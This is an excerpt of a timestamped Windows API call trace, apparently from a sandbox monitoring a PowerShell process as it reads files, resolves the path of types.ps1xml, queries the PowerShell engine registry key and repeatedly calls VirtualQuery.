	[0332.978] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.978] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.979] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.979] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.979] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.979] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.980] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.980] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.980] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.980] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.980] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.981] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.981] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.981] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.982] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.982] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.983] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.983] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.983] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.983] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.984] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.984] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.984] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.984] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.984] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.985] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.985] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.985] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.985] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.985] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.987] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.987] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.988] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.988] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.988] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.988] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.988] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.989] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.989] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1b4, lpOverlapped=0x0) returned 1
	[0332.989] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x0, lpOverlapped=0x0) returned 1
	[0332.989] CloseHandle (hObject=0x330) returned 1
	[0332.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0332.989] SetErrorMode (uMode=0x1) returned 0x1
	[0332.989] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d300 | out: lpFileInformation=0x14d300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0332.989] SetErrorMode (uMode=0x1) returned 0x1
	[0332.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0332.990] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3e8 | out: phkResult=0x14d3e8*=0x330) returned 0x0
	[0332.990] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d36c, lpData=0x0, lpcbData=0x14d368*=0x0 | out: lpType=0x14d36c*=0x1, lpData=0x0, lpcbData=0x14d368*=0x56) returned 0x0
	[0332.990] CoTaskMemAlloc (cb=0x5a) returned 0x28ff30
	[0332.990] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d33c, lpData=0x28ff30, lpcbData=0x14d338*=0x56 | out: lpType=0x14d33c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d338*=0x56) returned 0x0
	[0332.990] CoTaskMemFree (pv=0x28ff30) 
	[0332.990] RegCloseKey (hKey=0x330) returned 0x0
	[0332.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0332.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0334.750] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0334.755] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0334.758] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0334.758] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0334.758] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0334.758] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0334.759] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0334.760] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.269] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.269] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.270] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.270] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.270] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.270] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.270] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.270] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.278] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.283] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.284] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.284] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.284] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.284] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.285] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.285] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.285] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.285] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.285] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.285] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.286] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.286] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.288] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.289] VirtualQuery (in: lpAddress=0x14c0e0, lpBuffer=0x14cfa0, dwLength=0x30 | out: lpBuffer=0x14cfa0*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.289] VirtualQuery (in: lpAddress=0x14c0e0, lpBuffer=0x14cfa0, dwLength=0x30 | out: lpBuffer=0x14cfa0*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.290] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.290] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.756] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.757] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.758] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.765] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0335.765] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0335.765] CoTaskMemFree (pv=0x1f7c30) 
	[0335.766] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.773] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.773] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
